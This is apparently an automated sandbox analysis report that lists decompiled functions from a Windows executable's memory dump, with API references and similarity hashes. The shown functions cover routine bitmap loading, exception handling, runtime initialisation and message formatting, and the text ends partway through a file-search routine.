GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0028B6D2
__freea.LIBCMT ref: 0028B6DB

Part of subcall function 00287A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00282FA6,?,0000015D,?,?,?,?,00284482,000000FF,00000000,?,?), ref: 00287ABC

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 79963ba46a3fbc1b55e376952c4c750646bfa72671c5aea58db9b0fc7b00b884
Instruction ID: 73dcf58dafbe49f070cbe2646c7f716336e4c2773420b2d7941be1628a3e3e25
Opcode Fuzzy Hash: 79963ba46a3fbc1b55e376952c4c750646bfa72671c5aea58db9b0fc7b00b884
Instruction Fuzzy Hash: AD31EE76A2122AAFCF25AF65DC45DAE7BA9EB00310F084128FC04DA190E735DD64CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0027A4F8, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0027A4F8(void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0x2a0060, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E0027963A(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E0027952A(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E0027963A(0x66);
						if(_t26 != 0) {
							DeleteObject(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E0027958C(_v20);
					_t13 = E0027975D(_t21, _t32, _t22, E00279549(_v24), _t11);
					DeleteObject(_t22);
					_t22 = _t13;
				}
				return _t22;
			}

0x0027a4f8
0x0027a4f8
0x0027a50e
0x0027a512
0x0027a515
0x0027a517
0x0027a520
0x0027a520
0x0027a529
0x0027a536
0x0027a541
0x0027a54a
0x0027a54e
0x0027a551
0x0027a553
0x0027a553
0x0027a54e
0x0027a558
0x0027a568
0x0027a570
0x0027a572
0x0027a574
0x0027a57c

APIs

LoadBitmapW.USER32(00000065), ref: 0027A508
GetObjectW.GDI32(00000000,00000018,?), ref: 0027A529
DeleteObject.GDI32(00000000), ref: 0027A551
DeleteObject.GDI32(00000000), ref: 0027A570

Part of subcall function 0027963A: FindResourceW.KERNEL32(00000066,PNG,?,?,0027A54A,00000066), ref: 0027964B
Part of subcall function 0027963A: SizeofResource.KERNEL32(00000000,76DB5689,?,?,0027A54A,00000066), ref: 00279663
Part of subcall function 0027963A: LoadResource.KERNEL32(00000000,?,?,0027A54A,00000066), ref: 00279676
Part of subcall function 0027963A: LockResource.KERNEL32(00000000,?,?,0027A54A,00000066), ref: 00279681

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID:
API String ID: 142272564-0
Opcode ID: a0bb08ddf604de6aa26d5c9bf62f644189d7c9ff9ed0933a569a0f47b6c6ecf5
Instruction ID: b782f04e061c5290efe17dc5fa79b15e3cb061b363fedc5a5d9cbc6e554e0b5d
Opcode Fuzzy Hash: a0bb08ddf604de6aa26d5c9bf62f644189d7c9ff9ed0933a569a0f47b6c6ecf5
Instruction Fuzzy Hash: 0401DB3295032627C71277785C4AE7F776EDFC6B61F888111FA08B7191DE718C2256A1

Uniqueness

Uniqueness Score: -1.00%

Function 00281A89, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00281A89(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E002820D8(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0027F1DB(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E002822DA(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00281893(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0027F1A9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x00281a89
0x00281a89
0x00281a8c
0x00281a91
0x00281a94
0x00281a96
0x00281a99
0x00281a9c
0x00281a9d
0x00281aa0
0x00281aa5
0x00281aa5
0x00281aa8
0x00281aac
0x00281aaf
0x00281ab4
0x00281ab1
0x00281ab1
0x00281ab1
0x00281ab7
0x00281abd
0x00281ac0
0x00281ac2
0x00281ac5
0x00281ac8
0x00281ac9
0x00281ad2
0x00281ad7
0x00281ada
0x00281ae0
0x00281ae3
0x00281ae6
0x00281ae9
0x00281aea
0x00281aed
0x00281af8
0x00281afc
0x00000000
0x00281afc
0x00281b03

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00281AA0

Part of subcall function 002820D8: ___AdjustPointer.LIBCMT ref: 00282122

_UnwindNestedFrames.LIBCMT ref: 00281AB7
___FrameUnwindToState.LIBVCRUNTIME ref: 00281AC9
CallCatchBlock.LIBVCRUNTIME ref: 00281AED

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
Instruction ID: 480f16328aa74c369bd9343d53bb91d488b91503752f3ec6df2e2307a6817468
Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
Instruction Fuzzy Hash: E3010536011109FBCF12AF95CC01EDA3BAAEF58714F048115FD18651A0D372E8B2EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 002815E6, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002815E6() {
				void* _t4;
				void* _t8;

				E002829B7();
				E0028294B();
				if(E0028268E() != 0) {
					_t4 = E00281726(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E002826CA();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x002815e6
0x002815eb
0x002815f7
0x002815fc
0x00281601
0x00281603
0x0028160e
0x00281605
0x00281605
0x00000000
0x00281605
0x002815f9
0x002815f9
0x002815fb
0x002815fb

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 002815E6
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 002815EB
___vcrt_initialize_locks.LIBVCRUNTIME ref: 002815F0

Part of subcall function 0028268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0028269F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00281605

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
Instruction ID: fc536478caf878f05cbd87c7e250fd2074ac718c4c020b7c76126e46563c13e5
Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
Instruction Fuzzy Hash: 18C0027C433662D11C103EB522126A9130C49A27C5BD514C1F942264D3A949083F1F32

Uniqueness

Uniqueness Score: -1.00%

Function 0027975D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0027975D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				char _v112;
				intOrPtr _v116;
				intOrPtr* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v144;
				intOrPtr* _v152;
				intOrPtr _v156;
				intOrPtr* _v164;
				char _v180;
				intOrPtr* _v184;
				intOrPtr* _v192;
				intOrPtr* _v200;
				intOrPtr* _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				char _v228;
				intOrPtr _v232;
				void* __edi;
				signed int _t71;
				intOrPtr* _t77;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t81;
				short _t89;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				signed int _t103;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				signed int _t120;
				intOrPtr _t124;
				intOrPtr* _t132;
				intOrPtr* _t134;
				void* _t146;
				void* _t149;
				signed int _t152;
				void* _t154;
				long long* _t155;
				long long _t158;

				_t158 = __fp0;
				if(E0027960F() != 0) {
					_t146 = _a4;
					GetObjectW(_t146, 0x18,  &_v68);
					_t152 = _v4;
					_t120 = _v0;
					asm("cdq");
					_t71 = _v72 * _t152 / _v76;
					if(_t71 < _t120) {
						_t120 = _t71;
					}
					_t149 = 0;
					_push( &_v112);
					_push(0x2933ac);
					_push(1);
					_push(0);
					_push(0x29417c);
					if( *0x29dff4() < 0) {
						L18:
						return _t146;
					} else {
						_t77 = _v132;
						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
						_t79 = _v152;
						if(_t78 >= 0) {
							_v144 = 0;
							_push( &_v144);
							_push(_t79);
							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
								_t81 = _v152;
								asm("fldz");
								_push(0);
								_t124 =  *_t81;
								_push(_t124);
								_push(_t124);
								 *_t155 = _t158;
								_push(0);
								_push(0);
								_push(0x29418c);
								_push(_v156);
								_push(_t81);
								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
									E0027E920(_t146,  &_v136, 0, 0x2c);
									_v136 = 0x28;
									_v132 = _t152;
									_v120 = 0;
									_v128 =  ~_t120;
									_v124 = 1;
									_t89 = 0x20;
									_v122 = _t89;
									_t154 =  *0x29dedc(0,  &_v136, 0,  &_v180, 0, 0);
									asm("sbb ecx, ecx");
									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t132 = _v216;
										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
										_t101 = _v120;
										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
										_t103 = _v136;
										_push(_v232);
										_t134 = _v140;
										_v220 = _t103;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t120;
										_push(_t103 * _t120 << 2);
										_push(_v136 << 2);
										_push( &_v228);
										_push(_t134);
										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
											DeleteObject(_t154);
										} else {
											_t149 = _t154;
										}
										_t111 = _v164;
										 *((intOrPtr*)( *_t111 + 8))(_t111);
									}
									_t93 = _v212;
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									_t95 = _v212;
									 *((intOrPtr*)( *_t95 + 8))(_t95);
									_t97 = _v224;
									 *((intOrPtr*)( *_t97 + 8))(_t97);
									if(_t149 != 0) {
										_t146 = _t149;
									}
									goto L18;
								}
								_t113 = _v184;
								 *((intOrPtr*)( *_t113 + 8))(_t113);
							}
							_t115 = _v192;
							 *((intOrPtr*)( *_t115 + 8))(_t115);
							_t79 = _v200;
						}
						 *((intOrPtr*)( *_t79 + 8))(_t79);
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00279954();
			}

0x0027975d
0x00279767
0x00279782
0x0027978e
0x00279798
0x0027979f
0x002797a3
0x002797a4
0x002797aa
0x002797ac
0x002797ac
0x002797b3
0x002797b5
0x002797b6
0x002797be
0x002797bf
0x002797c0
0x002797cd
0x00279948
0x00000000
0x002797d3
0x002797d3
0x002797e3
0x002797e8
0x002797ec
0x002797f9
0x00279803
0x00279804
0x0027980a
0x0027981c
0x00279820
0x00279822
0x00279823
0x00279825
0x00279826
0x00279827
0x0027982a
0x0027982b
0x0027982c
0x00279831
0x00279835
0x0027983b
0x00279851
0x00279859
0x00279863
0x00279869
0x0027986d
0x00279876
0x0027987b
0x0027987e
0x00279895
0x0027989b
0x002798a9
0x002798ab
0x002798b7
0x002798ba
0x002798cf
0x002798d2
0x002798d6
0x002798da
0x002798de
0x002798e5
0x002798e9
0x002798ed
0x002798f6
0x00279901
0x00279906
0x00279907
0x0027990d
0x00279914
0x0027990f
0x0027990f
0x0027990f
0x0027991a
0x00279921
0x00279921
0x00279924
0x0027992b
0x0027992e
0x00279935
0x00279938
0x0027993f
0x00279944
0x00279946
0x00279946
0x00000000
0x00279944
0x0027983d
0x00279844
0x00279844
0x0027980c
0x00279813
0x00279816
0x00279816
0x002797f1
0x00000000
0x002797f1
0x002797cd
0x00279769
0x0027976d
0x00279771
0x00000000

APIs

Part of subcall function 0027960F: GetDC.USER32(00000000), ref: 00279613
Part of subcall function 0027960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0027961E
Part of subcall function 0027960F: ReleaseDC.USER32(00000000,00000000), ref: 00279629

GetObjectW.GDI32(?,00000018,?), ref: 0027978E

Part of subcall function 00279954: GetDC.USER32(00000000), ref: 0027995D
Part of subcall function 00279954: GetObjectW.GDI32(?,00000018,?), ref: 0027998C
Part of subcall function 00279954: ReleaseDC.USER32(00000000,?), ref: 00279A20

Strings

(, xrefs: 00279859

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: eceda1f49c722b0cb2a66b10915f84a8fad334b4b1bbb00d2cdf645bd7a90d70
Instruction ID: 3e3a93b5afb045dbb865178e3a30fa4ba88aec94e7b657f81ebed42aec2eacdc
Opcode Fuzzy Hash: eceda1f49c722b0cb2a66b10915f84a8fad334b4b1bbb00d2cdf645bd7a90d70
Instruction Fuzzy Hash: 0E6113B1218301AFD214CF64C888E6BBBE9FF89704F10891DF699CB260D671E955CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00270A9F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E00270A9F(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x6f;
				if(_t47 > 0) {
					__eflags = _t26 - 0x7d;
					if(_t26 == 0x7d) {
						E0027C339();
						_t28 = E0026DA42(_t41, 0x96);
						return E00279735( *0x2a75d8, E0026DA42(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E0026DA42(_t41));
						_push( *_t44);
						L19:
						_t32 = E0027A57D();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M00270D63))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E0026DA42(__ecx, 0xc8) =  &_v516;
										__eax = E00263E41( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E0027A57D( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E0026DA42(_t41);
							L7:
							_push(0);
							L8:
							return E0027A57D();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M00270D0B))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00279D55();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E0026DA42(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E0026DA42(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E0026DA42(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}

0x00270a9f
0x00270aa9
0x00270aab
0x00270aae
0x00270ab1
0x00270cd8
0x00270cdb
0x00270cdd
0x00270ce9
0x00000000
0x00270d00
0x00270ab7
0x00270ab7
0x00270cce
0x00270bfb
0x00270c00
0x00270c01
0x00270b3e
0x00270b3e
0x00270b07
0x00000000
0x00270b07
0x00270abd
0x00270ac0
0x00270bc0
0x00270bc3
0x00270c83
0x00270c83
0x00270c86
0x00270cc4
0x00000000
0x00270cc4
0x00270c88
0x00270c88
0x00270c8b
0x00270cbd
0x00000000
0x00270cbd
0x00270c8d
0x00270c8d
0x00270c90
0x00270cb0
0x00270cb3
0x00000000
0x00270cb3
0x00270c92
0x00270c92
0x00270c95
0x00270ca6
0x00000000
0x00270ca6
0x00270c97
0x00270c97
0x00270c9a
0x00270c9c
0x00000000
0x00270c9c
0x00270bc9
0x00270bc9
0x00270c7c
0x00000000
0x00270c7c
0x00270bcf
0x00270bd2
0x00270bd5
0x00270bdb
0x00000000
0x00270be2
0x00000000
0x00000000
0x00270bec
0x00000000
0x00000000
0x00270bf6
0x00000000
0x00000000
0x00270c08
0x00000000
0x00000000
0x00270c0c
0x00000000
0x00000000
0x00270c10
0x00270c13
0x00000000
0x00000000
0x00270c1a
0x00000000
0x00000000
0x00270c21
0x00000000
0x00000000
0x00270c28
0x00270c2b
0x00000000
0x00000000
0x00000000
0x00000000
0x00270c35
0x00270c38
0x00000000
0x00000000
0x00270c4d
0x00270c59
0x00270c5e
0x00270c61
0x00270c67
0x00000000
0x00000000
0x00270bdb
0x00270bd5
0x00270ac6
0x00270ac6
0x00270bb7
0x00270bb9
0x00270b5b
0x00270b5b
0x00270ae3
0x00270ae3
0x00270ae5
0x00000000
0x00270aea
0x00270acf
0x00270ad5
0x00000000
0x00270af2
0x00270af4
0x00270af9
0x00000000
0x00000000
0x00270adc
0x00270ade
0x00000000
0x00000000
0x00270b00
0x00270b02
0x00000000
0x00000000
0x00270b0d
0x00270b10
0x00000000
0x00000000
0x00270b1c
0x00270b1f
0x00000000
0x00000000
0x00270b23
0x00270b26
0x00000000
0x00000000
0x00270b2a
0x00270b2d
0x00000000
0x00000000
0x00270b34
0x00270b36
0x00270b3b
0x00270b3c
0x00000000
0x00000000
0x00270b46
0x00270b49
0x00000000
0x00000000
0x00270b4d
0x00270b50
0x00000000
0x00000000
0x00270b54
0x00270b56
0x00000000
0x00000000
0x00270b63
0x00270b65
0x00000000
0x00000000
0x00270b6c
0x00270b6f
0x00000000
0x00000000
0x00270b76
0x00270b79
0x00000000
0x00000000
0x00000000
0x00000000
0x00270b80
0x00270b83
0x00270b8b
0x00000000
0x00000000
0x00270ba0
0x00270ba3
0x00000000
0x00000000
0x00270baa
0x00270bad
0x00270b12
0x00270b17
0x00270b18
0x00000000
0x00000000
0x00270ad5
0x00270acf
0x00270ac0
0x00270d09
0x00270d09

APIs

_swprintf.LIBCMT ref: 00270C59

Strings

%ls, xrefs: 00270ADE, 00270AF4
%s: %s, xrefs: 00270C68

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 9dc7a6eeba3a828c26e67c32aeec26f77c14ccc90edc13ca13041f514074d60a
Instruction ID: 6209263970c549fc9b30adfd2abec13f9b9f2745d97238aab8dfefaa35016f11
Opcode Fuzzy Hash: 9dc7a6eeba3a828c26e67c32aeec26f77c14ccc90edc13ca13041f514074d60a
Instruction Fuzzy Hash: 2C51E5316BC305FAE6311FD08DC6F2A75599B05B0CF60C506B78E644E2D6F26E787A12

Uniqueness

Uniqueness Score: -1.00%

Function 00289E43, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00289E43(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				intOrPtr _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				signed int _t201;
				union _FINDEX_INFO_LEVELS _t202;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				void* _t212;
				intOrPtr _t213;
				void* _t214;
				signed int _t218;
				void* _t220;
				signed int _t221;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				void* _t226;
				void* _t227;

				_t80 = _a8;
				_t223 = _t222 - 0x20;
				if(_t80 != 0) {
					_t207 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t198 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t207;
					if( *_t207 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t198;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t198;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t209;
						if(_t209 != 0) {
							_t196 = _t198;
							_t157 = _t159;
							do {
								_t183 =  *_t196;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t196 = _t196 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
